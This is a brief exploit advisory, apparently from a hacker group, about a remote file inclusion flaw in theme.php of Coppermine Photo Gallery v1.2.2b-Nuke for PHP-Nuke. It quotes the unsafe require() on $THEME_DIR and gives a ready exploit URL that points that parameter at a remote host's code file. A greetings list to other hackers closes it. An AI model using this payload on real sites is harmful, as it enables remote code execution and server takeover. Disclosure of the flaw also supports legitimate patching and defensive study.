----------------------------------------------------

Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities

----------------------------------------------------

Discovered By A-S-T TEAM

WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR

----------------------------------------------------

site of script:http://phpnuke.org

----------------------------------------------------

Vulnerable: Coppermine Photo Gallery v1.2.2b-Nuke

----------------------------------------------------

vulnerable file :

------------------

theme.php

----------------------------------------------------

vulnerable code:

----------------------------------------------------

require($THEME_DIR."/user_list_info_box.inc");

$THEME_DIR parameter File inclusion

----------------------------------------------------

Exploit:

www.example.com/modules/coppermine/themes/default/theme.php?THEME_DIR=ht
tp://evalcode.txt

------------------------------------------------------------------------
----------------------------

Discovered By A-S-T TEAM

Site:www.lezr.com

Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL
,SNIPER_SA,ALMOKAN3,Broken-proxy AND ALL LEZR.COM Member

[ reply ]